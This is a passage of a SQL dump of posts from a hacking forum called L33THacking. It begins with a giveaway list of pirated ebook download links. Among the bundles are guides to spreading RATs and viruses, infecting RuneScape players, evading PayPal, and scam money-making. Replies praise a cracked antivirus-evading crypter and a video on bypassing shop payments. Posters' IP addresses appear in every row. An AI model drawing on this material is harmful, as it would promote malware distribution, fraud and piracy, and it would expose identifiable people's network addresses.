Coding Interview - 4th Edition Dictionary Of Networking Hacker Linux Uncovered (2005) Hacker\'s Delight (2002) Hacker\'s Guide Hacker\'s Handbook Hackers_Secrets Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition (2001) Hacking For Dummies (2004) Hacking For Dummies Hacking Gmail Guide Honeypots - Tracking Hackers (2002) The Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers (2005) The Hacker’s Underground Handbook The Shellcoders Handbook Firefox Hacks - Tips & Tools For Next-Generation Web Browsing (2005) Google Hacking For Penetration Testers (2005) Google Hacks, 3rd Edition (2006) Hacker Web Exploitation Uncovered Web Hacking - Attacks And Defense (2002)[/spoiler] [url=http://www.mediafire.com/?2ybm6t67br38uwu]Network Programming (67 MB)[/url] [spoiler] Illustrated TCP-IP - A Graphic Guide To The Protocol Suite (1999) Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture, 4rd Ed [Comer, Scan, OCR] - 2000 - (By Laxxuss) Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version Tcp Ip For Dummies TCP-IP Foundations (2004) TCP-IP Network Administration, 3rd Edition (2002) TCPIPSettingsinDOS TCPIPTools Understanding TCP-IP (2006) Unix Network Programming - Volume I - The Sockets Networking API, 3rd Edition (2003)[/spoiler] [url=http://www.mediafire.com/?11igyosyfn4nsko]Network Security (64 MB)[/url] [spoiler] Cryptography And Network Security, 4th Edition (2005) Designing And Implementing Linux Firewalls And QoS (2006) Firewall Policies And VPN Configurations (2006) Fundamentals of Network Security LANSecurity Maximum Computer Security-A Hacker\'s Guide to Protecting Your Internet Site and Network McGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed Network Security Assessment - From Vulnerability To Patch (2006) Network Security Hacks - 100 Industrial-Strength Tips & Tools, 1st Edition (2004) Network Security With OpenSSL (2002) Self-Defending Networks - The Next Generation Of Network Security (2006)[/spoiler] [url=http://www.mediafire.com/?g2v5dn9in1dn5cr]Programming Part 1 (144 MB)[/url] [url=http://www.mediafire.com/?m6tb69oet9yt19n]Programming Part 2 (90 MB)[/url] [spoiler] Learning PHP & MySQL (2006) Michael - Mastering UNIX Shell Scripting (Wiley, 2003) Hacker Disassembling Uncovered C For Dummies C Game Programming For Dummies Visual Studio NET C# For Dummies - Quick Reference Guide C By Example (1999) C In A Nutshell (2005) C Primer Plus, 5th Edition (2004) C-C++ Programmer\'s Reference, 3rd Edition (2003) Cryptography In C And C++ (2001) Effective C++, 3rd Edition (2005) Optimizing C++ (1999) Programming Embedded Systems In C And C++ (1999) Secure Programming Cookbook For C And C++ (2003) Beginning C++ Game Programming C++ A Beginners Guide - Herbert Schildt C++ By Dissection C++ For Dummies C++ For Mathematicians - An Introduction For Students And Professionals C++ From The Ground Up, 3rd Edition C++ Plus Data Structures, 3rd Edition C++ Timesaving Techniques For Dummies Microsoft Visual Studio C++ 6 For Dummies - Quick Reference Guide Visual Studio NET C++ For Dummies - Quick Reference Guide You Can Program In C++ - A Programmers Introduction Beginning Java Programming for Dummies Java 2 for Dummies Original Eddition_2 Java For Dummies Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition (2000) Beginning Linux Programming Burtch - Linux Shell Scripting with Bash (2004) Glass,Ables - Linux for Programmers and Users (Prentice, 2006) Guide To Assembly Language Programming In Linux (2005) Korn Shell Unix and Linux Programming Manual, 3rd ed 2001 Matthew - Beginning Linux Programming 4e (Wrox, 2007) Mitchell - Advanced Linux Programming (New Riders, 2001) Wall - Linux Programming Unleashed (SAMS, 1999) Advanced Perl Programming, 2nd Edition (2005) Beginning Perl Web Development - From Novice To Professional (2006) Intermediate Perl (2006) Learning Perl Objects, References, & Modules (2003) Learning Perl, 4th Edition (2005) Minimal Perl For UNIX And Linux People (2005) Perl Best Practices (2005) Perl Cookbook Perl Hacks - Tips And Tools For Programming Debugging And Surviving (2006) Perl Medic - Transforming Legacy Code (2004)[/spoiler] [url=http://www.mediafire.com/?pd8ld2um8vcckm8]SQL (67 MB)[/url] [spoiler] Mastering_MySQL_4.2003.Sybex MySQL - 2nd Edition (Sams) MySQL - Essential Skills (2004) MySQL - Visual QuickStart Guide, 2nd Edition (2006) MySQL Certification Study Guide (2004) MySQL Cookbook (2002) MySQL Cookbook MySQL Pocket Reference (2003) MySQL Tutorial (2003) MySQL.PHP.Database.Applications SQL - A Beginner\'s Guide, 2nd Edition (2003) SQL - Practical Guide For Developers (2005) SQL Bible (2003) SQL Cookbook (2005) SQL For Dummies, 6th Edition (2006) SQL Sams Teach Yourself MySQL in 21 Days -- SAMS SQL Server 2000 SQL Injection Attacks And Defense SQL Injection eBook SQL Injection Advance Injection[/spoiler] [url=http://www.mediafire.com/?9ucp3ir85za6f6c]Unix (58 MB)[/url] [spoiler] Absolute BSD - The Ultimate Guide To FreeBSD (2002) Absolute OpenBSD - Unix For The Practical Paranoid 2003 Embedded FreeBSD Cookbook (2002) Learning the UNIX Operating System 4th ed 1998 Mastering FreeBSD And OpenBSD Security (2005) SysAdmin - Security Tools in FreeBSD Teach Yourself FreeBSD In 24 Hours (2003) The Complete FreeBSD, 4th Edition (2003) The OpenBSD 4.0 Crash Course (2007) Unix Power Tools, 3rd Edition (2002) linuxKernelSux OReilly.Understanding.The Linux Kernel 1st Edition Understanding The Linux Kernel, 3rd Edition (2005) A Practical Guide To Linux Commands, Editors, And Shell Programming (2005) Get_Acquainted_with_Linux_Security_and_Optimization_System Hack Proofing Linux - A Guide To Open Source Security (2001) Linux Basic Commands Linux Kernel Development, 2nd Edition Linux Kernel module programming guide 1 Linux Shell Scripting With Bash (2004) Linux_Administration_Made_Easy Linux_Administrators_Security_Guide McGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU OReilly - Linux_Network_Administrator\'s_Guide_Second_Edition Sam teach you Linux in 24 hours Securing Linux A Survival Guide for Linux Security Version 1.0 2003 Securing Linux Servers for Service Providers SELinux (2004) shell-scripting tcsh Unix Shell Programming, 3rd Edition (2003)[/spoiler] [url=http://www.mediafire.com/?augpbbaydqv9r8l]Windows XP (13 MB)[/url] [spoiler] Hacking Windows XP Hardcore Windows XP[/spoiler] [url=http://www.mediafire.com/?iq0o6hp2zouoper]For Dummies (69 MB)[/url] [spoiler] Building Flash Web Sites Building Your Business With Google For Dummies Building Your Own Home For Dummies Chinese For Dummies Logic For Dummies Music Composition For Dummies Music Theory For Dummies Trigonometry Workbook For Dummies Web Design For Dummies[/spoiler] [url=http://www.mediafire.com/?igrye5npwzbmklb]How to Spread Your RAT and/or Virus (3 MB)[/url] [spoiler] Beginner Spreading Guide Spreading eBook Torrent Spreading Ebook Project Spread Runescape Spreading 1 Runescape Spreading 2 Spreading Methods Targeted Spreading and How to Keep Them[/spoiler] [url=http://www.mediafire.com/?w3e1y1s1q4tu74z]Moneymaking SMALL PACK (20 MB)[/url] [spoiler] Guide To Making Money Online 75$ A Day With Autopilot Exploit An Online Casino For Constant Cash $2300 In 3 Days Using Twitter Traffic ClickBank Method Make $100 Per Day Make $50 Day In 10mins With EnviroFile and Linkbucks Easy $300 20 Ways To Make $100 Per Day Online Bulking Up - A Wealthy Lifestyle Make Money Online With Files-Cashout Make Money On Hotfile Proxy Money Making Guide One Click Money What Is Neobux And How Do You Manage Referrals Earn $100-200+ A Day 4k-in-a-day FileIceGuide MoneyMachineV1.0 PayPal Machine The Online Money Maker Ultimate Cash Machine 400$ + Daily 4 Ways To Find The Perfect Niche Good niches How To Setup Your CPA Niche Amazon EBook Classy Money Commission System Neobux Basics PayPal Booster Super Fast List Building Twitter Basics For Internet Marketers Viral Traffic Amazing Sharecash Method [$30+ a Day] Dominating ShareCash - 10 Ways Dominating ShareCash Earn $300 A Day - Sharecash Earn $300 Per Day Online How To Conquer Sharecash For Newbies - $100-300 Daily How To Earn $50 A Day With Sharecash ShareCash Secrets From X-STARK The Insane Sharecash Guide [/spoiler] [url=http://www.mediafire.com/?oh2ot8qd5gtqzqd]Moneymaking LARGE PACK (196 MB)[/url] [spoiler] This file has too many titles to list. It literally has everything you could possibly need and more. Enjoy! [/spoiler] [url=http://www.mediafire.com/?k46x77a6z52o7gw]Social Engineering (64 MB)[/url] [spoiler] Propaganda-and-Mass-Persuasion Art of War PDF How to influence people and win friends Kevin Mitnick - The Art of Intrusion Robert Greene, The 48 Laws of Power Social_Engineering__The_Art_of_Human_Hacking The Art of Human Hacking The Complete Idiots Guide to Persuasion The Power Of Persuasion The Science Of Influence Get Anyone to do Anything The Great book of SE SE Alienware SE Kindle Fire SE Logitech SE McDonalds SE Kindle Fires and DX Free Games From BlockBuster Free Subway for Life How to Get a Free Whopper SE Nike Fuel Bands How to Get Free Stuff From eBay[/spoiler] [url=http://www.mediafire.com/?cvpsyf2hapi22ff]RuneScape (69 MB)[/url] [spoiler] A Guide to infecting RS players Billabong\'s Lure Method FreeMembership How to Get RS IPs Runescape Recovering Resources RuneScape Recovery Guide RunescapeIPGuide Shads Billionaires Guide v7 RuneScape Gold Monetizing Method TehRunescapeGuide Shads Billionaires Guide v8 200K Per Hour Melee Combat EXP Guide Runescape Gold Strategy Guide[/spoiler] [url=http://www.mediafire.com/?2tkaqbhrst7wzsa]PayPal (916 KB)[/url] [spoiler] Ultimate PayPal Guide Paypal In Your Pocket Paypal Hell How to Hide From PayPal Paypal Get Accepted for Free PayPal Verification US[/spoiler] [url=http://www.mediafire.com/?4e3i91m0gbwt2q4]YouTube (558 KB)[/url] [spoiler] How To Get Massive Youtube Traffic Youtube eBook Making Money From Youtube[/spoiler] [url=http://www.mediafire.com/?4sz9u1qa7af87dr]40 SparkCharts (Highly Recommended) (113 MB)[/url] [spoiler] Abnormal Psychology African-American History Algebra I American Sign Language Anthropology Astronomy Biology Calculus I Calculus II Calculus Reference Chemistry Distance Learning Environmental Studies ESL and EFL Grammar European History French Grammar French Vocabulary Java Latin Grammar Macroeconomics Microbiology Microeconomics Organic Chemistry I Organic Chemistry II Philosophy Physics Poetry Shakespeare Sociology Spanish Grammar Spanish Idioms Spanish Verbs Spanish Vocabulary Spark Catalouge Study Tactics The Bible US History - Pre Columbian - 1865 Western Art History Women\'s Studies World History[/spoiler] [url=http://www.mediafire.com/?3czwdw0agn7xipx]A Selection of Childrens Books (14 MB)[/url] [spoiler] Adams, Richard - Watership Down Beagle, Peter S - The Last Unicorn Carroll, Lewis - Alice\'s Adventures in Wonderland (illustrated) Carroll, Lewis - Through the Looking-Glass (illustrated) Gaiman, Neil - Coraline (2002, cover) Goldman, William - The Princess Bride Graham, Kenneth - The Wind in the Willows Milne, A.A. - The House at the Pooh Corner Milne, A.A. - Winnie-the-Pooh Norton, Juster - The Phantom Tollbooth (illustrated) Norton, Mary - Bed-Knob and Broomstick Norton, Mary - The Borrowers Saint Exupery, Antoine de - The Little Prince (illustrated) Salten, F. - Bambi Smith, Betty - A Tree Grows in Brooklyn Steinbeck, John - The Red Pony White, E.B. - Charlotte\'s Web[/spoiler][/align] [align=center][color=#FFA500][size=xx-large]I wish you all the best with my giveaways. I sincerely hope that they can benefit you in some way or another.[/size][/align][/color] [color=#1E90FF][align=center][size=x-large]Please let me know if any links are broken or incorrectly placed! If you think this thread is awesome, keep it alive![/size][/align][/color] [color=#FF4500][align=center][size=x-large]Post more cool giveaways below![/size][/align][/color] [align=center][spoiler][size=x-small]Every file made available on this thread is for educational purposes only. They should in no way be used for illegal or blackhat activity. I do not claim ownership of any of these files.[/size][/spoiler][/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '81bf75589b7d8f0969de5fd0f273ff62', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2766', '547', '2757', '19', 'RE: Collection Of Skype Resolvers', '0', '203', 'NeonLights', '1348870083', '[quote=\'NXK\' pid=\'2757\' dateline=\'1348868704\'] My skype resolver had a adf.fly link I didn\'t give permission to re leak with out it. And my skype resolver it down. [/quote] o sorry :S il remove the link?', '67.68.72.99', '1128548451', '1', '0', '0', '0', '1', '8200db4f6906eafcf8915b222d2cbc32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2769', '558', '0', '33', 'Guess this font?', '0', '82', 'iTzIpod', '1348883452', 'I wanna try to make a Cloud Strife signature. Which I know is gonna turn out [b]HORRIBLE[/b. But oh well. And to do so, I need to know what this font is called :3 I will rep you (if I can), or, I will give you a spot in Unique. (But you can get kicked) [img]http://i224.photobucket.com/albums/dd214/GenisSage91/CloudStrifeSig.jpg[/img] Please help me find out what that font is called.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4ce55740717d137862f29d2b944c2ef5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2770', '538', '2732', '63', 'RE: Staff userbar', '0', '1', 't3h jok3r', '1348888359', 'LOL well you do have a point, I think you should ask reloadzor for a userbar directly. If we get a better userbar then I have no problem but must look good with the stars and/or username color.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a9dca6a6919ffcb554ff25ef270141b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2771', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '1', 't3h jok3r', '1348888381', 'Welcome to L33THacking, I\'m the one who referred you. Thanks for joining.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '35d12ccac37c9caa6c48dcf1a072375e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2778', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '2', 'Apathy', '1348888995', 'Sorry man I am not hating I am trying to help you improve. Also I wrote have and it auto corrected to jaw. So if you ever see random words it is auto correct.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '3deefb7ecc5b2caea53c49cdd685ebb6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2773', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348888515', 'Damn then that\'s cool. I don\'t think we would have any problems. Thanks for helping out LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f961ad20b3991c78fd1ce5a86c63df74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2774', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '203', 'NeonLights', '1348888588', 'holy shit amazing release!!! :D! dont release this anywhere else then here', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '4a2d1b9841f92eb6e9fe1e4d66aa181b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2775', '514', '2674', '9', 'RE: How to make serious money', '0', '1', 't3h jok3r', '1348888604', '[quote=\'iTzIpod\' pid=\'2674\' dateline=\'1348746820\'] [quote=\'p420\' pid=\'2616\' dateline=\'1348679861\'] Nice method but when I click on buy now on the website, it opens the outlook mail program on my PC. [/quote] I don\'t know why it does that. I would love to help but I don\'t know.. If possible, try uninstalling the outlook. (If you want) Or disable it if possible. [/quote] When you click on buy now what happens?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '13d06842c8ba659439080f9eef91e498', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2776', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348888737', 'Cool, I\'ll add these sections soon. Post your favorite games.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '508dc69d2b41ea682aa2e159ec7770a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2777', '537', '2710', '12', 'RE: [Very Hot!] How to bypass online shop payment! [Video]', '0', '2', 'Apathy', '1348888827', 'Great share thanks man. :)', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '9d0a161e7959696f35d12179ab324541', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2779', '551', '2759', '61', 'RE: Dexter\'s Thread Design', '0', '2', 'Apathy', '1348889144', 'Nice share I might download later. Pretty clean.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '8ad9be41b2a7a347d38505a05955b860', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2780', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '1', 't3h jok3r', '1348890308', 'L33THacking is growing and thanks to everyone on LH for participating.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a5d919c4bc0633e3da9fedbdb5c39078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2781', '559', '0', '3', 'Upgrade Price Lowered', '0', '1', 't3h jok3r', '1348890531', 'I was thinking about the upgrade system and I personally think $10 for a small site like LH is too much so I lowered it down to $5. If you are looking forward to buy an upgrade and need a review if the upgrade is worth it or not then feel free to contact any Elite Member.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1d8b514c01060536b969f4bc28e85393', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2782', '536', '2686', '4', 'RE: Hey everyone!', '0', '5', 'Timmy', '1348891314', 'Welcome to L33THacking bro.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e362b6bf97487cc0d84fd1bca9dd040c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2783', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '5', 'Timmy', '1348891350', 'Welcome to l33thacking and oh hell yeah my son got some pussy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd4bc54ae545b2eab2a166d9d04d16111', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2784', '558', '2769', '33', 'RE: Guess this font?', '0', '5', 'Timmy', '1348891569', 'It\'s hard to determine unless you can find someone who is really good at photoshop and likes using different fonts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09db48f0c1b05586cfc0eb9a2f900045', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2785', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '5', 'Timmy', '1348891618', 'The new userbar looks nice thaks op', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f41bcac6fc6a904a4417c0f27187aa6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2786', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '5', 'Timmy', '1348891789', 'Nice tutorial very easy to follow. Will come in handy some day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bd4a2e51173e5249ce23baf21e49817e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2787', '535', '2677', '14', 'RE: Proxy list', '0', '5', 'Timmy', '1348891912', 'Nice list. Most seem to work thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6a24e0af5ccc8314b1530ca454b5fd7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2788', '560', '0', '24', 'Windows 7 Official direct downloads', '0', '205', 'mothered', '1348895056', 'Greetings to all, Here\'s the Official download for Windows 7, In ISO format and fully bootable. Please note that only the \"Professional\" and \"Home Premium\" editions are operative, In both the x86 and 64 bit architectures. If you do require activation, just use the Windows 7 Loader by Daz. Link: http://www.mydigitallife.info/download-windows-7-iso-official-32-bit-and-64-bit-direct-download-links/ Cheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '33c77e4d1d328a6c9e4c8bb164e30e4e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2789', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '205', 'mothered', '1348895185', 'That\'s quite an achievement In such a short space of time mate. Congratz, and well done :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '13c9d57662f7b8dccce307765c4eee1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2790', '561', '0', '24', 'What Antivirus are you running and why?', '0', '205', 'mothered', '1348895341', 'Greetings L33thacking, What Antivirus are you running and \"why\". Please elaborate on your choice. I\'m running Norton AV 2012. My reasons: ** Symantec have significantly Improved It\'s products, hence from 2010 onwards, Norton Is very light on system resources. **It\'s \"Sonar\" protection Is an excellent defense mechanism that works on a \"Heuristic Analysis\" methodology (viruses that are not defined In the vendors database definitions), hence Is able to detect most newly-developed malicious content. ** It\'s \"Pulse Updates\" periodically performs live definition updates, thus no requirement for user-Intervention. ** The \"Norton Safe Web\" or Site Safety actively monitors a given site(s), and displays the safety rating prior to entering the site. ** The \"Norton Background Tasks\", autonomously performs system scans, thus keeping your system free from malicious content at all times. There\'s heaps more, but I\'ve just documented the priorities. How about you guys? Edit: typed too fast, hence grammatical error corrected.', '210.50.40.19', '-768464877', '1', '0', '205', '1348895408', '1', 'e0f15b4d1e888f1ddd186166f4e8ed1e', '0', '1348895408'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2791', '562', '0', '7', 'World\'s Longest Email Address', '0', '205', 'mothered', '1348895544', 'Hey guys, Here\'s a site whereby you can create a really long email address. Whether you do It for a laugh, or just to annoy someone, It\'s certainly quite cool. Link: http://www.abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com/', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '93df68f6f0eac027261b065ac557c1b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2792', '563', '0', '25', 'Virus Removal Tools', '0', '205', 'mothered', '1348895920', 'Greetings everyone, Here\'s a few virus removal tools, that are certainly worth keeping on hand. Now they don\'t replace your current AV, but more so can be used to remove malicious content that your Antivirus failed to detect. Kaspersky: http://www.kaspersky.com/virus-removal-tools Avira AntiVir: http://www.avira.com/en/support-download-avira-antivir-removal-tool/product/ Avast: http://www.avast.com.au/utilities/virus-cleaner McAfee Stinger: http://www.mcafee.com/au/downloads/free-tools/stinger.aspx Cheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '593d4cdc5b01ed9b23813014cafe64b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2793', '564', '0', '7', 'What Do You Do To Relax?', '0', '205', 'mothered', '1348896086', 'Greetings L33thacking, With all our day to day computational stuff going on, It can get pretty Intense, so what do you do to relax and take time out? I tend to watch some funny YouTube videos, and go for a walk to refresh.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e68f528d5bf353db0e3adf601c078f52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2794', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '205', 'mothered', '1348896492', 'It\'s good that you mentioned to backup the Registry, prior to any editing. Given that It\'s a critical part of the O/S, any Incorrect deletion of critical keys and values, can cause significant system Instability, and/or loss of functionality. Excellent point too, that not all viruses create a Registry entry. An overall great tut, well done.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'c4cc01310a7690896bbd643b0949e495', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2795', '551', '2759', '61', 'RE: Dexter\'s Thread Design', '0', '82', 'iTzIpod', '1348920875', 'Thanks. No problem. Just trying to contribute! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fef2f471972121eb5a8ef6cbc5e7b044', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2796', '559', '2781', '3', 'RE: Upgrade Price Lowered', '0', '82', 'iTzIpod', '1348920964', 'Nice update. You got a point. When L33tHacking becomes big, lets try making it $10 again. And then maybe $15. Upgrade Section is kinda dead right now. So it\'s not really worth it at the moment. Unless we gain a lot 